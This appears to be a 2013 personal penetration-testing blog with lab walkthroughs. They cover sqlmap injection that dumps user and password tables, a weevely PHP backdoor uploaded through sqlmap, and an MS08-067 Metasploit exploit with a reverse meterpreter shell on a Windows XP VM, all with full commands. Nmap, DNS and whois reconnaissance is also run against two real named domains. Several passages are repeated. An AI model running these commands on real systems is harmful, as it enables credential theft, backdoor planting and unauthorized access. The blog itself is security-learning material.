Friday, 5 April 2013
Advance Information Gathering using Maltego
this is the result of information gathering from www.is2c-dojo.com and www.spentera.com using Maltego Radium CE 3.3.0. i choose footprint L1 mode :
www.is2c-dojo.com
www.spentera.com
FAILED : cannot get information about www.spentera.com because website is temporarily unavailable!
UPDATE!
www.spentera.com is now up, and here's the result :
www.is2c-dojo.com
www.spentera.com
FAILED : cannot get information about www.spentera.com because website is temporarily unavailable!
www.spentera.com is now up, and here's the result :
upload backdoor via sql injection
firstly open dvwa from web browser. before log in activate live HTTP header tool from menu>tools>application auditing>Live HTTP header to capture cookie and session to be used to bypass login for sqlmap
after log in, set security dvwa to low and go to sql injection menu. try to input ' to see the vulnerability from sql injection. and the error message means that the target is vulnerable.
copy url and run sqlmap to dump the database using the information gathered form previous step.
./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie="security=low; PHPSESSID=qqmt0g6sgvh802823qu1apnv84" --dbs
after that find the database and table contain username and password mysql to log in
./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie="security=low; PHPSESSID=qqmt0g6sgvh802823qu1apnv84" -D dvwa --tables
./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie="security=low; PHPSESSID=qqmt0g6sgvh802823qu1apnv84" -D dvwa -T users --dump
now i get the username and password from all users. next i will generate backdoor to insert into target. open weevely and generate backdoor. the backdoor stored in generate.php and has a password 123.
./weevely.py generate 1234 generate.php
after backdoor was made, i will upload the generate.php to /var/www/dvwa/bd.php.
./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie="security=low; PHPSESSID=qqmt0g6sgvh802823qu1apnv84" --file-write=/pentest/backdoors/web/weevely/generate.php --file-dest=/var/www/dvwa/bdr.php
now the backdoor is uploaded to the target. try to access via weevely
./weevely.py http://localhost/dvwa/bdr.php 1234
now we have sucessfully enter the system via backdoor. now i can play around with the system :)
Wednesday, 3 April 2013
web application sql vulnerabilities testing
Experiment : given website application hosted in localhost/perpustakaan and my job is to check and penetrate the vulnerabilities of the system. To do it ethically i use OWASP testing guide as my reference guide.
firstly let's do some information gathering. type robots.txt in the end of the url to find the hidden url form the website. the target url is localhost/perpustakaan.
the results show the url directories that is hidden from user. now i will check each of them to know the content of the folders.
now let's focus on folder "tampilan" and check the filename containing word "view" > click "anggota_view1.php" and the result is :
gotcha! i now logged in as an admin and i can edit or delete data user, just like admin! now i will try to get the admin password by edit one of the data and check the vulnerabilities from SQL injection using sqlmap.
./sqlmap.py -u http://localhost/perpustakaan/proses/anggota_update1.php?id=301 --dbs
voila! i got the username and password lists of the users and admins. i can use one of the lists to log in to the system :)
firstly let's do some information gathering. type robots.txt in the end of the url to find the hidden url form the website. the target url is localhost/perpustakaan.
the results show the url directories that is hidden from user. now i will check each of them to know the content of the folders.
now let's focus on folder "tampilan" and check the filename containing word "view" > click "anggota_view1.php" and the result is :
gotcha! i now logged in as an admin and i can edit or delete data user, just like admin! now i will try to get the admin password by edit one of the data and check the vulnerabilities from SQL injection using sqlmap.
./sqlmap.py -u http://localhost/perpustakaan/proses/anggota_update1.php?id=301 --dbs
from sqlmap i know that the url is vulnerable with sql injection and get information about available databases. i choose the "sips" database which is looks connected to the target. i will dump the tables using sqlmap.
i got the table lists. now i will dump the "anggota" and "pegawai" table.
./sqlmap.py -u http://localhost/perpustakaan/proses/anggota_update1.php?id=301 -T anggota,pegawai --dump
voila! i got the username and password lists of the users and admins. i can use one of the lists to log in to the system :)
Tuesday, 2 April 2013
Exploit smb service in windows xp
In previous chapter i talked about information gathering and service enumeration. now let's go to the next level. this time i will write about my experiment how to exploit one of windows service : smb service. i am still using backtrack 5 R3 as a attacking tools and windows xp installed in virtualbox as an experiment lab.
here's the steps to exploit system in windows xp :
- information gathering, using nmap
- service enumeration and vurnerability assesment, using nessus
- exploitation, using metasploit framework
now let's get started. firstly turn on windows xp in virtual box and make sure backtrack and windows xp is connected using ping
next step, do the information gathering using nmap, in menu backtrack > information gathering > network analysis > network scanners > nmap
nmap -A 192.168.56.101
from nmap we get information about OS version, services and open ports. i'll process this data to get more detailed information about the open ports. using nessus (if you can't find in backtrack menu, you must install and register your username first).
type 127.0.0.1:8834 in web browser and login with your account. after logged in, click the menu scan and fill out the form :
name : anything you want
type : just choose run now to begin scanning immediately
policy : choose your type of network
scan target : your target's address
target file : (optional)
click launch to begin the scan.
wait for a while, and after completed click the result :
from the result we can see the vulnerabilities and the rank from low, medium and high. now we choose the service that has a high vulnerability, in this case is port 445 with 2 high vulnerable.
we can see there are 2 service that have high vulnerability, the smb and RPC. click the smb service for a detailed information.
from detailed information we can see that this service is highly vulnerable and can be exploited with metasploit.
now let's begin the penetration using metasploit. in menu backtrack > exploitation tools > network exploitation tools > metasploit framework > msfconsole
to search the exploit modules type search platform:windows type:exploit osvd:48153 path:exploit/windows/smb
here's the results, just choose the great or excellent one. in this case i will use exploit/windows/smb/ms08_067_netapi.
to know the option needed type : show option.
RHOST is target host, use the target IP address by typing : set RHOST 192.168.56.101. to begin penetration we must use the payload (bad script). there are plenty of payloads available and ready to use, just choose one of them.
to show all avalable payloads just type: show payloads.
in this case i will use payload windows/meterpreter/reverse_http. to use it type: set payloads windows/meterpreter/reverse_http.
the metasploit will request for LHOST, just type: set LHOST 192.168.56.1 to use your IP address as a LHOST.
to begin exploitation just type exploit and hit enter. if succcessfully, the meterpreter shell will appear.
to make sure that you have been succesfully enter the system type : sysadmin
and voila! the system is successfully penetrated and ready to be controlled.
to end the exploitation session just type exit and hit enter.
Wednesday, 27 March 2013
Information Gathering : DNS Analysis
Hello guys, in this post i will try to gather information from websites with provided tools in backtrack. the target website is www.is2c-dojo.com and www.spentera.com. i will try the active and passive Information Gathering, and i will try to get information from that website as many as i can.
as we know, information gathering consist of two techniques, the passive information gathering and active information gathering . now let's get started.
Active information gathering
how can we get information if we just know the domain? firstly we can use nmap to get information about IP, operating system and open ports. general syntax for nmap : nmap [Scan Type(s)] [Options] {target specification}. let's give a try!
from the syntax above i can get the information about IP, OS version, firewall type, and open ports. now let's dig deeper into the system.
One of the valuable information in website is DNS, and i will try to get DNS information using dnsenum.
general syntax : dnsenum.pl [Options] <domain>
from dnsenum we obtained information about host addresses, name servers, and mail server.
not satisfied with the finding? now let's try one more tools, called dnsmap. dnsmap is a tool to get the IP addresses associated with a domain name. general syntax of dnsmap is : dnsmap <target-domain> [options].
now let's use dnsmap for is2c-dojo.com and spentera.com
Passive Information Gathering
there are numbers of technique for passive information gathering, but i only write about some of them. first tool that i use is "googling". i will input simple query to the google website and see how many results found.
the second tool that i will use is whois to obtain the informations legally provided for the domain name rental. she syntax is : whois <domain>. let's try in is2c-dojo.com and spentera.com.
i think that's enough for today's post, i will continue my writing about information security in the next time, and last but not least sorry for my bad english :)
as we know, information gathering consist of two techniques, the passive information gathering and active information gathering . now let's get started.
Active information gathering
how can we get information if we just know the domain? firstly we can use nmap to get information about IP, operating system and open ports. general syntax for nmap : nmap [Scan Type(s)] [Options] {target specification}. let's give a try!
nmap -O www.is2c-dojo.com
nmap -O www.spentera.com
from the syntax above i can get the information about IP, OS version, firewall type, and open ports. now let's dig deeper into the system.
One of the valuable information in website is DNS, and i will try to get DNS information using dnsenum.
general syntax : dnsenum.pl [Options] <domain>
./dnsenum.pl www.is2c-dojo.com
./dnsenum.pl www.spentera.com
from dnsenum we obtained information about host addresses, name servers, and mail server.
not satisfied with the finding? now let's try one more tools, called dnsmap. dnsmap is a tool to get the IP addresses associated with a domain name. general syntax of dnsmap is : dnsmap <target-domain> [options].
now let's use dnsmap for is2c-dojo.com and spentera.com
./dnsmap is2c-dojo.com
./dnsmap spentrea.com
Passive Information Gathering
there are numbers of technique for passive information gathering, but i only write about some of them. first tool that i use is "googling". i will input simple query to the google website and see how many results found.
site:is2c-dojo.com
found 516 results
site:spentera.com
found 317 results
the second tool that i will use is whois to obtain the informations legally provided for the domain name rental. she syntax is : whois <domain>. let's try in is2c-dojo.com and spentera.com.
whois is2c-dojo.com
whois spentera.com
i think that's enough for today's post, i will continue my writing about information security in the next time, and last but not least sorry for my bad english :)
Subscribe to:
Posts (Atom)